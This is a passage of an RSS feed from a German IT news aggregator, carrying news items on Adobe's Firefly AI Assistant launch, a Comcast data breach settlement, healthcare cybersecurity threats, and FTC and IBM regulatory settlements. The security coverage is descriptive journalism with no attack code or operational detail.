<content:encoded><![CDATA[The Federal Trade Commission (FTC) and a group of eight states have announced a proposed settlement with big ad agencies that will prevent them from working together to avoid certain platforms like X based on their political viewpoints. In a complaint, the FTC argues that ad agencies violated antitrust rules by agreeing to a common […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Adobe’s new Firefly AI Assistant wants to run Photoshop, Premiere, Illustrator and more from one prompt]]></title>
<description><![CDATA[Adobe today launched its most ambitious AI offensive to date, unveiling the Firefly AI Assistant — a new agentic creative tool that can orchestrate complex, multi-step workflows across the company's entire Creative Cloud suite from a single conversational interface — alongside a raft of new video...]]></description>
<link>https://tsecurity.de/de/3435802/it-nachrichten/adobes-new-firefly-ai-assistant-wants-to-run-photoshop-premiere-illustrator-and-more-from-one-prompt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435802/it-nachrichten/adobes-new-firefly-ai-assistant-wants-to-run-photoshop-premiere-illustrator-and-more-from-one-prompt/</guid>
<pubDate>Wed, 15 Apr 2026 16:18:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.adobe.com/">Adobe</a> today launched its most ambitious AI offensive to date, unveiling the <a href="https://news.adobe.com/">Firefly AI Assistant</a> — a new agentic creative tool that can orchestrate complex, multi-step workflows across the company's entire <a href="https://www.adobe.com/creativecloud.html">Creative Cloud suite</a> from a single conversational interface — alongside a raft of new video, image, and collaboration features designed to position the company at the center of the rapidly evolving AI-powered content creation landscape.</p><p>The announcements, which also include a new Color Mode for <a href="https://www.adobe.com/products/premiere.html">Premiere Pro</a>, the addition of <a href="https://higgsfield.ai/kling-3.0">Kling 3.0 video models</a> to Firefly's growing roster of third-party AI engines, and <a href="http://frame.io/">Frame.io Drive </a>— a virtual filesystem that lets distributed teams work with cloud-stored media as though it lived on their local machines — represent Adobe's clearest signal yet that it views agentic AI not as a feature upgrade but as a fundamental reshaping of how creative work gets done.</p><p>"We want creators to tell us the destination and let the Firefly assistant — with its deep understanding of all the Adobe professional tools and generative tools — bring the tools to you right in the conversation," Alexandru Costin, Vice President of AI &amp; Innovation at Adobe, told VentureBeat in an exclusive interview ahead of the launch.</p><p>The stakes could hardly be higher. Adobe is fighting to convince Wall Street, creative professionals, and a wave of well-funded AI-native competitors that its decades-old software empire can not only survive the generative AI revolution but lead it.</p><h2><b>How Adobe turned a research prototype into a 100-tool creative agent</b></h2><p>The centerpiece of today's announcement is the <a href="https://www.adobe.com/products/firefly.html">Firefly AI Assistant</a>, which Adobe describes as a fundamentally new way to interact with its creative tools. Rather than requiring users to manually navigate between <a href="https://www.adobe.com/products/photoshop.html">Photoshop</a>, <a href="https://www.adobe.com/products/premiere.html">Premiere</a>, <a href="https://www.adobe.com/products/illustrator.html">Illustrator</a>, <a href="https://lightroom.adobe.com/">Lightroom</a>, <a href="https://www.adobe.com/express/">Express</a>, and other apps — selecting the right tool for each step of a complex project — the assistant lets creators describe an outcome in natural language. The agent then figures out which tools to invoke, in what order, and executes the workflow.</p><p>The assistant is the productized version of <a href="https://blog.adobe.com/en/publish/2025/10/28/our-view-agentic-ai-assistants-that-work-you-in-your-favorite-apps">Project Moonlight</a>, a research prototype Adobe first previewed at its annual MAX conference in the fall of 2025 and subsequently refined through a private beta. "This is basically [Project] Moonlight," Costin confirmed to VentureBeat. "We started with all the learnings from Moonlight, and we engaged with customers. We looked internally. We evolved that architecture to make it more ambitious."</p><p>Under the hood, Adobe says it has assembled roughly 100 tools and skills that the assistant can call upon, spanning generative image and video creation, precision photo editing, layout adaptation, and even stakeholder review through <a href="http://frame.io/">Frame.io</a>. The system is built around a single conversational interface inside the Firefly web app where users describe what they want and the assistant maintains context across sessions. Pre-built Creative Skills — purpose-built, multi-step workflow templates such as portrait retouching or social media asset generation — can be run from a single prompt and customized to match a creator's own style. The assistant also learns a creator's preferred tools, workflows, and aesthetic choices over time, and understands the content type being worked on — image, video, vector, brand assets — to make context-aware decisions.</p><p>Crucially, outputs use native Adobe file formats — PSD, AI, PRPROJ — meaning users can take any result into the corresponding flagship app for manual, pixel-level refinement at any point. "We always imagine this continuum where you can have complete conversational edits and pixel-perfect edits, and you can decide, as a creative, where you want to land," Costin said. The <a href="https://www.adobe.com/products/firefly.html">Firefly AI Assistant</a> will enter public beta in the coming weeks, though Adobe did not specify an exact date.</p><h2><b>Why Wall Street is watching Adobe's AI pricing model so closely</b></h2><p>For a company whose AI monetization story has faced persistent skepticism from investors, the pricing structure of the Firefly AI Assistant will be closely watched. Costin told VentureBeat that, at launch, using the assistant will require an active Adobe subscription that includes the relevant apps — meaning users who want the agent to invoke Photoshop cloud capabilities, for instance, will need an entitlement that includes the Photoshop SKU. Generative actions will consume the user's existing pool of generative credits, consistent with how Firefly credits work across the rest of Adobe's platform.</p><p>"To use some of these cloud capabilities from Photoshop and other apps, you need to have a subscription that includes access to the Photoshop SKU," Costin explained. "You'll be consuming your credits when you use generative features." He acknowledged, however, that the model could evolve: "As we better understand the value of this — and the costs of operating the brain, the conversation engine — things might change."</p><p>The question of whether Adobe can convert AI enthusiasm into meaningful revenue growth is anything but theoretical. When Adobe reported its <a href="https://www.adobe.com/cc-shared/assets/investor-relations/pdfs/21306202/ay45th643t5y46.pdf">most recent quarterly results</a> in March, it touted 10% year-over-year revenue growth to $6.4 billion and disclosed that annual recurring revenue from AI standalone and add-on products had reached $125 million — a figure CEO Shantanu Narayen projected would double within nine months.</p><h2><b>Adobe adds Chinese AI video models to Firefly, raising commercial safety questions</b></h2><p>Alongside the assistant, Adobe is expanding Firefly's roster of third-party AI models to include <a href="https://kling.ai/">Kling 3.0</a> and <a href="https://kling.ai/app/omni/new">Kling 3.0 Omni</a>, two video generation models developed by Kuaishou, the Chinese technology company. Kling 3.0 focuses on fast, high-quality production with smart storyboarding and audio-visual sync, while the Omni variant adds professional controls for shot duration, camera angle, and character movement across multi-shot sequences. The additions bring Firefly's model count to more than 30, joining Google's <a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2/">Nano Banana 2</a> and <a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-lite/">Veo 3.1</a>, Runway's <a href="https://firefly.adobe.com/generate/video">Gen-4.5</a>, Luma AI's <a href="https://firefly.adobe.com/generate/video?sdid=M7K4SCXX&amp;mv=search&amp;mv2=paidsearch&amp;ef_id=Cj0KCQjwy_fOBhC6ARIsAHKFB7-d4stemHQOm5wih7cWhSphxr0nbLAv4Lnfnn_612KrLlmQf5SwMm4aAsAPEALw_wcB%3AG%3As&amp;s_kwcid=AL%213085%213%21799093785594%21e%21%21g%21%21ray3.14%2123540033269%21193419771512&amp;gad_source=1&amp;gad_campaignid=23540033269&amp;gbraid=0AAAABBMYekTO4u4pE6vx1sRzw64rrdXnK&amp;gclid=Cj0KCQjwy_fOBhC6ARIsAHKFB7-d4stemHQOm5wih7cWhSphxr0nbLAv4Lnfnn_612KrLlmQf5SwMm4aAsAPEALw_wcB">Ray3.14</a>, Black Forest Labs' <a href="https://bfl.ai/models/flux-2">FLUX.2[pro]</a>, ElevenLabs' <a href="https://elevenlabs.io/blog/eleven-multilingual-v2">Multilingual v2</a>, and others.</p><p>When asked whether Adobe had concerns about integrating a model from a Chinese tech company given the current geopolitical climate, Costin was direct: "We think choice is what we want to offer our customers." He explained that Adobe's strategy distinguishes between its own commercially safe, first-party Firefly models — trained on licensed Adobe Stock imagery and public domain content — and third-party partner models, which carry different commercial safety profiles. "For some use cases, like ideation, non-production use cases, we got requests from customers to support some external models," Costin said. "If I'm in ideation, I might be more flexible with commercial safety. When I go into production, I’d want to have a model that gives you more confidence."</p><p>This raises an important nuance for the agentic era. When the <a href="https://www.adobe.com/products/firefly.html">Firefly AI Assistant</a> autonomously selects which model to use for a given task, the commercial safety guarantees may vary depending on which engine it invokes. Costin pointed to Adobe's <a href="https://helpx.adobe.com/creative-cloud/apps/adobe-content-authenticity/content-credentials/overview.html">Content Credentials</a> system — the metadata-and-fingerprinting framework developed through the Content Authenticity Initiative — as the mechanism for maintaining transparency. "The agentic power — and the fact that the assistant has access to all of those models — means it could decide to use a model that carries different content credentials," he acknowledged. "But with the transparency of content credentials, the user will know how a particular piece of content was created and can decide whether that's commercially safe or not." Adobe offers commercial indemnity for its first-party Firefly models but applies different indemnity levels for third-party models — a distinction that enterprise buyers, in particular, will need to carefully evaluate.</p><h2><b>Inside Adobe's active collaboration with Nvidia on long-running AI agent infrastructure</b></h2><p>Adobe's agentic ambitions also intersect with its strategic partnership with Nvidia, announced earlier this year at <a href="https://venturebeat.com/technology/nvidia-launches-enterprise-ai-agent-platform-with-adobe-salesforce-sap-among">Nvidia’s GTC conference</a>. When asked whether the Firefly AI Assistant's agentic capabilities are built on NVIDIA's agent toolkit and NeMo infrastructure, Costin revealed that the collaboration is active but has not yet made it into a shipping product.</p><p>"We're in active discussions — investigating not only <a href="https://www.nvidia.com/en-us/ai-data-science/foundation-models/nemotron/">Nemotron</a>," Costin said. "They have this technology called <a href="https://build.nvidia.com/openshell">Open Shell</a> and <a href="https://www.nvidia.com/en-us/ai/nemoclaw/">Nemo Claw</a>, which give us the ability to efficiently run long-running agentic workflows in a sandboxed environment." He said the technology would become increasingly important as Adobe pushes the assistant to handle longer, more autonomous creative tasks — but cautioned that "it's not shipping yet. It's being actively explored."</p><p>For Nvidia, which is <a href="https://venturebeat.com/technology/nvidia-launches-enterprise-ai-agent-platform-with-adobe-salesforce-sap-among">building an ecosystem of enterprise AI agent platforms</a> with partners like Adobe, Salesforce, and SAP, the partnership could eventually serve as a high-profile proof point for its agent infrastructure stack in the creative vertical. For Adobe, the ability to run complex, long-duration agentic workflows efficiently and securely in sandboxed environments could be the technical foundation that separates the <a href="https://www.adobe.com/products/firefly.html">Firefly AI Assistant</a> from lighter-weight chatbot integrations offered by competitors. The partnership also signals Adobe's recognition that the computational demands of agentic AI — where a single user request may trigger dozens of model calls and tool invocations — require infrastructure partnerships that go well beyond what a software company can build alone.</p><h2><b>Premiere Pro's new color grading mode and the tools Adobe is shipping today</b></h2><p>Beyond the headline AI assistant announcement, Adobe's broader set of updates reflects a company trying to strengthen its position across every phase of the content creation pipeline. Color Mode in <a href="https://www.adobe.com/products/premiere.html">Premiere Pro</a> may be the most significant near-term upgrade for working editors. Entering public beta today, Color Mode is described as a first-of-its-kind color grading experience built specifically for the way editors — rather than dedicated colorists — think and work. Adobe notes that it was developed through an extensive private beta with hundreds of working editors, and that participants reported they "actually enjoy color grading" — a sentiment suggesting Adobe may have found a way to democratize one of post-production's most intimidating disciplines. General availability is expected later in 2026.</p><p>The <a href="https://www.adobe.com/products/firefly/features/ai-video-editor.html">Firefly Video Editor</a> gains audio upgrades including the Enhance Speech feature migrated from Premiere and Adobe Podcast, direct Adobe Stock integration with access to more than 800 million licensed assets, and simple color adjustment controls with intuitive sliders and one-click looks. On the image editing front, Adobe introduced Precision Flow, which generates a range of semantic variations from a single prompt and lets users browse them via an interactive slider — a novel approach that Costin described as "the best slider-based control mixed with the best semantic understanding of not only the existing scene, but what the scene could be." AI Markup complements this by letting users draw directly on images to specify where and how edits should be applied. After Effects 26.2 adds an AI-powered Object Matte tool that dramatically accelerates rotoscoping and masking — create accurate mattes of moving subjects with a hover and click, refine with a Quick Selection brush, and perfect edges with a Refine Edge tool.</p><h2><b>Frame.io Drive wants to kill the shipped hard drive and make cloud media feel local</b></h2><p>Rounding out the announcements, <a href="http://frame.io/">Frame.io Drive</a> addresses one of the most persistent pain points in distributed video production: getting media from point A to point B without losing hours — or days — to downloads, syncing, and shipped hard drives. Frame.io Drive is a desktop application that mounts Frame.io projects to a user's computer so media appears in Finder or Explorer and behaves like local files. The underlying technology, called Frame.io Mounted Storage, streams media on demand as applications request it, while local caching ensures smooth playback. The product builds on streaming technology provided by Suite Studios, and the real-time file access capability is included with every Frame.io account. Adobe emphasized that all content lives solely within Frame.io and is never shared with third parties.</p><p>The move positions <a href="http://frame.io/">Frame.io</a> not just as a review-and-approval tool at the end of the production pipeline but as the central media layer from the very beginning of a project — from first capture through final delivery. If successful, the strategy could significantly deepen Adobe's lock-in with professional video teams by making Frame.io the single source of truth for distributed productions. Frame.io Drive and Mounted Storage will roll out in phases, with Enterprise customers gaining access starting today and accounts on other plans following shortly. Others can join a waitlist.</p><h2><b>Adobe's biggest challenge isn't building the AI — it's convincing creators to trust it</b></h2><p>Taken together, today's announcements paint a picture of a company executing aggressively across multiple fronts — but also one that is navigating a complex moment. Adobe first <a href="https://news.adobe.com/news/news-details/2023/adobe-unveils-firefly-a-family-of-new-creative-generative-ai">introduced Firefly in March 2023</a> as a family of generative AI models focused on image and text effects, with a strong emphasis on commercial safety through training on licensed Adobe Stock content. In the two years since, the company has rapidly expanded into video generation, multi-model access, and now agentic workflows — a trajectory that mirrors the broader industry's shift from standalone AI features to AI-native systems.</p><p>But the competitive field has grown dramatically. <a href="https://runwayml.com/">Runway</a>, <a href="https://pika.art/login">Pika</a>, and a host of AI-native video generation startups have captured mindshare among creators. <a href="https://www.canva.com/">Canva</a> has aggressively integrated AI into its design platform. And the emergence of powerful foundation models from <a href="https://openai.com/">OpenAI</a>, <a href="https://www.google.com/">Google</a>, and <a href="https://www.anthropic.com/">Anthropic</a> — the latter of which Adobe says it will integrate with Firefly AI Assistant capabilities — means the barrier to building creative AI tools has never been lower. Adobe is also navigating these product ambitions against a complex corporate backdrop: the <a href="https://news.adobe.com/news/2026/03/leadership-update">impending departure of CEO Shantanu Narayen</a>, an actively exploited zero-day vulnerability in <a href="https://thehackernews.com/2026/04/adobe-patches-actively-exploited.html">Acrobat Reader (CVE-2026-34621)</a> that had been used by hackers for months before being patched this week, a U.K. antitrust investigation over cancellation fees, and a recent <a href="https://news.adobe.com/news/2026/03/adobe-statement">$75 million lawsuit settlement</a>.</p><p>Adobe's response, articulated clearly through today's launches, is to lean into what it believes is its deepest moat: the integration of AI into a set of professional-grade, category-leading applications that no startup can replicate overnight. Costin framed the agentic transition as empowering rather than threatening to creative professionals, comparing Creative Skills to a next-generation version of Photoshop Actions — the macro-recording feature that has long allowed power users to automate repetitive tasks. "We want to help our customers become — from the ones doing all the work — to be creative directors, doing some of the work, but most importantly, guiding the assistant in executing some of those creative visions," he said.</p><p>It is a compelling pitch — and, in its own way, a revealing one. For three decades, Adobe made its fortune by selling the tools that turned creative vision into finished pixels. Now it is asking its customers to let an AI agent handle more of that translation, trusting that the human role will shift from operating the tools to directing the outcome. Whether creators embrace that bargain — and whether Wall Street rewards it — will determine not just Adobe's trajectory but the shape of an entire industry learning to create alongside machines.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[$117.5M Comcast settlement after data breach]]></title>
<description><![CDATA[Comcast has reached a settlement agreement of $117.5 million in response to a data breach that compromised customer information. This article has been indexed from CyberMaterial Read the original article: $117.5M Comcast settlement after data breach
Read more →
The post $117.5M Comcast settlement...]]></description>
<link>https://tsecurity.de/de/3435550/it-security-nachrichten/1175m-comcast-settlement-after-data-breach/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3435550/it-security-nachrichten/1175m-comcast-settlement-after-data-breach/</guid>
<pubDate>Wed, 15 Apr 2026 15:19:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Comcast has reached a settlement agreement of $117.5 million in response to a data breach that compromised customer information. This article has been indexed from CyberMaterial Read the original article: $117.5M Comcast settlement after data breach</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/117-5m-comcast-settlement-after-data-breach/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/117-5m-comcast-settlement-after-data-breach/">$117.5M Comcast settlement after data breach</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 biggest healthcare security threats]]></title>
<description><![CDATA[Cyberattacks targeting the healthcare sector have surged since the COVID-19 pandemic and the resulting rush to enable remote delivery of healthcare services. Security vendors and researchers tracking the industry have reported a major increase in phishing attacks, ransomware, web application atta...]]></description>
<link>https://tsecurity.de/de/3434692/it-security-nachrichten/7-biggest-healthcare-security-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3434692/it-security-nachrichten/7-biggest-healthcare-security-threats/</guid>
<pubDate>Wed, 15 Apr 2026 11:07:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.cio.com/article/650379/health-check-on-tech-ck-birla-hospitals-cio-mitali-biswas-on-moving-the-needle-towards-innovation.html">Cyberattacks targeting the healthcare sector</a> have surged since the COVID-19 pandemic and the resulting rush to enable <a href="https://www.csoonline.com/article/572219/critical-flaws-in-remote-management-agent-impacts-thousands-of-medical-devices.html">remote delivery</a> of healthcare services. Security vendors and researchers tracking the industry have reported a major increase in <a href="https://www.csoonline.com/article/514515/what-is-phishing-examples-types-and-techniques.html">phishing</a> attacks, <a href="https://www.csoonline.com/article/563507/what-is-ransomware-how-it-works-and-how-to-remove-it.html">ransomware</a>, web application attacks, and other threats targeting healthcare providers.</p>



<p>Recent rising of ransomware attacks on healthcare, in particular the <a href="https://www.csoonline.com/article/2140608/8-critical-lessons-from-the-change-healthcare-ransomware-catastrophe.html">Change Healthcare breach</a>, has been a <a href="https://www.csoonline.com/article/3484304/the-cyber-assault-on-healthcare-what-the-change-healthcare-breach-reveals.html">headline-grabbing wake-up call for healthcare execs</a>.</p>



<p>The trend has put enormous strain on healthcare security organizations. “The healthcare industry is under siege from a range of complex security risks,” says Terry Ray, vice president of product strategy at Varonis. “Cybercriminals are hunting for the sensitive and valuable data that healthcare has access to, both patient data and corporate data.”</p>



<p>Many organizations are <a href="https://www.cio.com/article/189277/why-big-tech-cant-crack-healthcare.html">struggling to meet the challenge</a> because they are under-resourced and rely on <a href="https://www.computerworld.com/article/1618392/cvs-app-glitch-makes-then-cancels-vaccine-appointments-and-it-gets-worse.html">vulnerable systems</a>, third-party applications, and APIs to deliver services.</p>



<p>Moreover, IT systems are increasingly used to optimize clinical encounters and patient care. Implantable devices, such as loop recorders, are increasingly being used to aid diagnoses, for example, of cardiac arrhythmias. These devices support telemetry, as do wearable devices, by transmitting patient data. Important healthcare decisions are made based on this data, with patient data being far more available due to advances in IT.</p>



<p>The increasing usage of IoT and IT in healthcare have improved clinical efficiency and decision-making certainty, but it does require greater attention to risk assessment, with the days of patient data stored in locked filing cabinets long gone, says WithSecure principal consultant Stuart Morgan.</p>



<p>“The impact of patient data being manipulated or leaked is intuitive and well understood, but the risk of denial of service — whether malicious or unintended — can be huge,” Morgan tells CSO. “Although resilience is built in to these systems to a degree, resorting to backup systems are by their nature far less efficient.”</p>



<p>Here, security experts identify the major cybersecurity threats healthcare organizations face today.</p>



<h2 class="wp-block-heading"><a></a>The rising ransomware threat</h2>



<p>Ransomware has emerged as one of the biggest cyber threats for healthcare today. Attackers have discovered that healthcare organizations delivering life-saving treatments can be more easily extorted than victims in almost every other sector. Many healthcare organizations are also more susceptible to attacks because of new digital applications and services they have launched to address demand for <a href="https://www.cio.com/article/302851/healthcare-leaders-dont-let-telehealth-be-a-pitfall.html">telehealth services</a>, among other digitalization efforts.</p>



<p>From 2022 to 2023, healthcare ransomware victims jumped 81%, according to a <a href="https://www.dni.gov/files/CTIIC/documents/products/Ransomware_Attacks_Surge_in_2023.pdf">study by US Office of the Director of National Intelligence</a>. This past year, healthcare ransomware attacks increased another 30%, as vendors and service partners joined clinics and hospitals as key targets for attacks, according to a <a href="https://industrialcyber.co/reports/healthcare-ransomware-attacks-surge-30-in-2025-as-cybercriminals-shift-focus-to-vendors-and-service-partners/">study by Comparitech</a>.</p>



<p>Pharmaceutical manufacturers, medical billing providers, and healthcare tech companies have also come under increasing fire from ransomware actors, Comparitech found.</p>



<p><a href="https://www.csoonline.com/article/3484304/the-cyber-assault-on-healthcare-what-the-change-healthcare-breach-reveals.html">Change Healthcare’s devastating ransomware attack in February 2024</a> is among the most notable. The attack, which disrupted insurance claim processing, prescription dispensing, and financial settlements, had a huge impact on hospitals, clinics, and pharmacies across the US. In August 2024, <a href="https://www.healthcaredive.com/news/mclaren-health-care-ransomware-attack-cyberattack/724615/">Michigan-based McLaren Health Care suffered the second of two ransomware attacks</a> over the course of just 12 months.</p>



<p>A <a href="https://www.england.nhs.uk/synnovis-cyber-incident/">June 2024 ransomware attack on NHS-affiliated UK pathology services Synnovis</a><strong> </strong>caused massive disruption in parts of London, forcing hospitals to cancel planned procedures and resulting in a temporary shortage of blood supplies. The Qilin ransomware group exfiltrated data before deploying ransomware that hobbled Synnovis’ IT systems, affecting blood tests, diagnostics, and lab services.</p>



<p><strong>Medical equipment firm </strong><a href="https://www.stryker.com/us/en/about/news/2026/a-message-to-our-customers-03-2026.html">Stryker experienced global network disruptions to its IT systems</a><strong> </strong>following a cyberattack in March 2026. Initially ransomware was suspected but Iran-linked group Handala quickly became the prime suspect in an attack that wiped an estimated 200,000 devices as part of a broader campaign against US and Israeli targets.</p>



<p>Electronic health records (EHRs) and systems present the biggest risk in healthcare today, says Caleb Barlow, president and CEO of CynergisTek. “Past attacks have shown when a hospital undergoes a ransomware-induced lockdown period, access to EHRs is shut down, and patients may have to be diverted for care,” he says. “Such attacks can prevent access to critical prescription information and dosing for patients with complex, chronic conditions like diabetes or cancer. Worse, hackers can potentially take it a step further and manipulate health record data to undermine patient care.”</p>



<p>Historically, healthcare institutions transferred this risk to cyber insurance, but that is becoming more difficult because insurers are making it harder for organizations to purchase ransomware protection without specific controls such as <a href="https://www.csoonline.com/article/563753/two-factor-authentication-2fa-explained.html">multi-factor authentication</a> and <a href="https://www.csoonline.com/article/653052/how-to-pick-the-best-endpoint-detection-and-response-solution.html">endpoint detection and response technologies</a>, Barlow says.</p>



<h2 class="wp-block-heading"><a></a>Cloud vulnerabilities and misconfigurations</h2>



<p>Many <a href="https://www.csoonline.com/article/571171/how-jefferson-health-enhanced-cybersecurity-via-its-cloud-transformation.html">healthcare organizations have adopted cloud services</a> as part of broader digital transformation initiatives. As a result, patient health information (PHI) and other sensitive data is increasingly being hosted in vendor cloud environments.</p>



<p>The trend has broadened attack surface at healthcare organizations, says Anthony James, vice president of products at Infoblox, especially as healthcare organizations often use multiple cloud vendors and services with differing security standards and practices, making it hard to apply a consistent data protection policies.</p>



<p>Sixty-one percent of healthcare companies said they experienced a cloud cyberattack in the past 12 months in a February 2024 <a href="https://kms-healthcare.com/blog/cloud-security-in-healthcare/">report by healthcare software developer KMS Healthcare</a>.</p>



<p>In March 2026, <a href="https://www.healthleadersmedia.com/technology/carecloud-reports-ehr-breach">US healthcare software vendor CareCloud’s EHR environment suffered a breach</a>, disrupting access for 45,000 providers.</p>



<p>Attacks aren’t the only cyber risks healthcare organizations face with rising cloud use. Misconfigurations play a role as well.</p>



<p>In April 2025, US health insurer <a href="https://www.hipaajournal.com/blue-shield-of-california-google-ads-data-breach/">Blue Shield of California found that it had exposed member data</a> — including protected health information — to Google’s advertising platform for three years up until January 2024 because of a flawed Google Analytics setup on some of its web pages.</p>



<h2 class="wp-block-heading"><a></a>Web application attacks</h2>



<p>Web application attacks targeting healthcare entities have also spiked sharply in recent years, with <a href="https://www.csoonline.com/article/565192/what-is-xss-cross-site-scripting-attacks-explained.html">cross-site scripting attacks</a> among the most common, along with <a href="https://www.csoonline.com/article/564663/what-is-sql-injection-how-these-attacks-work-and-how-to-prevent-them.html">SQL injection</a>, protocol manipulation attacks, and remote code execution/remote file inclusion attacks.</p>



<p>“Technically speaking, web application attacks can be incredibly challenging for under-resourced healthcare organizations to manage,” Varonis’ Ray says. To address the issue, healthcare organizations must implement controls that enable better visibility into third-party applications and API connections. Only then will the security team be able to understand who is trying to access critical data and whether that activity should be permitted.</p>



<h2 class="wp-block-heading"><a></a>Bad-bot traffic</h2>



<p>Traffic from bad bots — such as those attempting to scrape data, send spam, or download unwanted software — present another major challenge for healthcare organizations. The problem became especially pressing during the pandemic when governments around the world set up new websites and other digital infrastructure to support COVID vaccine registrations and appointments.</p>



<p>“Increased levels of traffic result in downtime and disruption for legitimate human users who are trying to access critical services on their healthcare providers’ site,” Ray says. “It might also result in increased infrastructure costs for the organization as it tries to sustain uptime from the persistent, burdensome level of elevated traffic.”</p>



<p>The latest <a href="https://www.imperva.com/blog/2025-imperva-bad-bot-report-how-ai-is-supercharging-the-bot-threat/">2025 edition of Imperva’s Bad Bot report</a> estimates malign bots account for nearly a third (37%) of internet traffic, up from 32% in the year prior. Imperva warned that AI is “supercharging the bot threat” alongside a shift in advanced bot traffic targeted APIs rather than applications, reflecting how API endpoints often handle sensitive or high-value data.</p>



<p>“Financial services, business, telecom, and healthcare are among the most targeted industries for bot attacks on APIs, accounting for over 75% of all API attacks,” Imperva reports.</p>



<p>Bad bots can lead to healthcare data breaches, for example through <a href="https://www.csoonline.com/article/567905/credential-stuffing-explained-how-to-prevent-detect-and-defend-against-it.html">credential stuffing</a> attacks against patient accounts, and scraping of sensitive health information.</p>



<p>Cybercriminals target confidential health information, such as patient records, medical history, and insurance details because this stolen data can be sold on the dark web for profit or used for fraudulent activities, Imperva warns.</p>



<h2 class="wp-block-heading"><a></a>Increased phishing volumes</h2>



<p>Phishing attacks pose a major threat to the healthcare industry as they do in almost every sector. Again, the pandemic provided a unique backdrop for a rise in phishing volumes versus healthcare organizations. In a <a href="https://www.himss.org/sites/hde/files/media/file/2020/11/16/2020_himss_cybersecurity_survey_final.pdf">survey</a> of 168 healthcare cybersecurity professionals conducted by Healthcare Information and Management Systems Society (HIMSS) at the time found that phishing was the typical initial point of compromise for most security incidents.</p>



<p>“Phishing attacks are the top type of significant security incident reported by respondents,” HIMSS noted in its report. “Phishers were the top type of threat actor responsible for significant security incidents at healthcare organizations.”</p>



<p>But phishing has long been an issue for healthcare. Stats compiled by the US Department of Health and Human Services (HHS) record that 18% of 4,419 reported breaches of PHI between 2009 and 2021 involved either phishing attacks or the hacking of email accounts, according to the <a href="https://www.hipaajournal.com/healthcare-data-breaches-due-to-phishing/">HIPAA Journal</a>.</p>



<p>Phishing was the initial vector in high-profile attacks against healthcare organizations <a href="https://www.hhs.gov/guidance/document/anthem-pays-ocr-16-million-record-hipaa-settlement-following-largest-us-health-data-breach">Anthem (2015)</a> and <a href="https://www.hipaajournal.com/magellan-health-suffers-ransomware-attack/">Magellan Health (2020)</a>, among others.</p>



<p>A <a href="https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7062337/">study by UK medical journal BMJ</a> found that around 3% of emails sent to hospital staff over a one-month period were suspected threats.</p>



<p>While many staff appear to be aware of phishing and respond appropriately, ongoing education is required — particularly about the risk of leaking information of potential use to attackers through social media, the BMJ advised.</p>



<h2 class="wp-block-heading"><a></a>Smart devices</h2>



<p>Wearable and implantable smart medical devices are a proven cybersecurity risk. These technologies certainly offer better analysis, assisting diagnosis of medical conditions while aiding independent living, but mistakes made in securing such medtech have exposed vulnerable users to potential attack.</p>



<p>A seminal moment was the late <a href="https://www.theregister.com/2011/10/27/fatal_insulin_pump_attack/">Barnaby Jack’s hacking of an insulin pump</a> in 2011. This attack over Bluetooth had a maximum range of approximately 300 meters.</p>



<p>Since then, security researchers at Pen Test Partners have found “closed loop” insulin trial data on the public internet.</p>



<p>“In one case, we could have modified the readings taken by the body-worn continuous glucose monitor and automatically, remotely administered a fatal dose of insulin to around 3,000 users in the trial,” Ken Munro, managing director of Pen Test Partners, tells CSO. “Fortunately, the vendor involved responded very quickly to our report and had the system secured the same day.”</p>



<p>Munro adds: “Other connected medtech devices Pen Test Partners have found security issues with include cranial stimulators, dosing pumps, and medical robots, among many others. Fortunately, the smart devices threat has been recognized and regulators are starting to take action.”</p>



<p>For example, the <a href="https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity-medical-devices-frequently-asked-questions-faqs">US Food &amp; Drug Administration (FDA) introduced FD&amp;C 524b</a> in 2023 to drive cybersecurity in connected medical devices.</p>



<h2 class="wp-block-heading">Generative AI</h2>



<p>As healthcare staff adopt generative AI, the risk of leaking sensitive information through prompts and documents has grown.</p>



<p>Regulated data, such as patient records and medical information, is especially at risk, accounting for 89% of all data policy violations occurring in the context of gen AI usage, significantly higher than the cross-industry average of 31%, according to a <a href="https://www.netskope.com/resources/threat-labs-reports/threat-labs-report-healthcare-2026">2026 study by Netskope</a>.</p>



<p>Moreover, the Netskope report shows that healthcare organizations’ deployment and usage of internal AI tools, which require bespoke security guardrails, is accelerating. The proportion of healthcare workers using gen AI applications managed by their organization jumped from 18% to 67% in 2025, significantly ahead of cross-industry averages (26% to 62%), according to the study.</p>



<p>The need for bespoke security controls for AI systems is illustrated by <a href="https://mindgard.ai/blog/doctronic-is-now-accepting-new-patients-and-unsafe-instructions?utm_source=chatgpt.com">research from Mindgard showing that the clinical AI tool Doctronic could be compromised</a> to spread conspiracy theories or even manipulate prescription guidance.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM’s government DEI settlement could increase pressure to avoid tech hiring diversity]]></title>
<description><![CDATA[IBM has agreed to settle a complaint from the US Justice Department around its initiatives to diversify its workforce and to encourage hiring of underrepresented groups, contrary to a presidential directive. The federal contractor also agreed to pay the government roughly $17 million.



The pres...]]></description>
<link>https://tsecurity.de/de/3433999/it-nachrichten/ibms-government-dei-settlement-could-increase-pressure-to-avoid-tech-hiring-diversity/</link>
